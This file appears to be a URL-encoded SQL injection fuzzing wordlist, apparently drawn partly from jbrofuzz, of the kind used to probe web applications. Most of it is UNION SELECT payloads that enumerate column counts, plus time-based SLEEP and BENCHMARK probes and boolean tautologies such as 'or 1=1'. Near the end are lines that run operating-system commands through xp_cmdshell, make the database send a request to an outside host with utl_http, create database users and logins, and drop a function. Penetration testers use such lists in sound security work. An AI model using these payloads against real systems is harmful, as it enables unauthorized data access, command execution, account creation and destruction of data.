%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--%20
%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23
%20UNION%20ALL%20SELECT%20CHAR(113)%2BCHAR(106)%2BCHAR(122)%2BCHAR(106)%2BCHAR(113)%2BCHAR(110)%2BCHAR(106)%2BCHAR(99)%2BCHAR(73)%2BCHAR(66)%2BCHAR(109)%2BCHAR(119)%2BCHAR(81)%2BCHAR(108)%2BCHAR(88)%2BCHAR(113)%2BCHAR(112)%2BCHAR(106)%2BCHAR(107)%2BCHAR(113),NULL--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX'
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX'--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX'%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--%20
%20UNION%20ALL%20SELECT%20'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23
%20UNION%20ALL%20SELECT%20NULL%20
%20UNION%20ALL%20SELECT%20NULL--%20
%20UNION%20ALL%20SELECT%20NULL%23
%20UNION%20ALL%20SELECT%20SLEEP(5)--%20
%20UNION%20ALL%20SELECT%20USER()--%20
%20UNION%20ALL%20SELECT%20USER(),SLEEP(5)--%20
%20UNION%20SELECT%20@@VERSION,SLEEP(5),"'3
%20UNION%20SELECT%20@@VERSION,SLEEP(5),"'3'"%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),3
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),4
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),4%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23
%20WHERE%201%3D1%20AND%201%3D0
%20WHERE%201%3D1%20AND%201%3D0--
%20WHERE%201%3D1%20AND%201%3D0%23
%20WHERE%201%3D1%20AND%201%3D1
%20WHERE%201%3D1%20AND%201%3D1--
%20WHERE%201%3D1%20AND%201%3D1%23
%23%20contains%20statements%20from%20jbrofuzz
%23%20you%20will%20need%20to%20customize/modify%20some%20of%20the%20values%20in%20the%20queries%20for%20best%20effect
%'%20AND%208310%3D8310%20AND%20'%'%3D'
%'%20AND%208310%3D8311%20AND%20'%'%3D'
';%20exec%20master..xp_cmdshell%20'ping%2010.10.1.2'--
'||utl_http.request('httP://192.168.1.1/')||'
1'%20and%201%3D(select%20count(*)%20from%20tablenames);%20--
1%20and%201%3D1
1%20exec%20sp_%20(or%20exec%20xp_)
1%20or%201%3D1
1'%20or%20'1'%3D'1
1'1
’%20or%20‘1’%3D’1
'create%20user%20name%20identified%20by%20'pass123'%20--
'create%20user%20name%20identified%20by%20pass123%20temporary%20tablespace%20temp%20default%20tablespace%20users;%20
'exec%20sp_addlogin%20'name'%20,%20'password'%20--
IF(7423%3D7423)%20SELECT%207423%20ELSE%20DROP%20FUNCTION%20xcjl--
IF(7423%3D7424)%20SELECT%207423%20ELSE%20DROP%20FUNCTION%20xcjl--
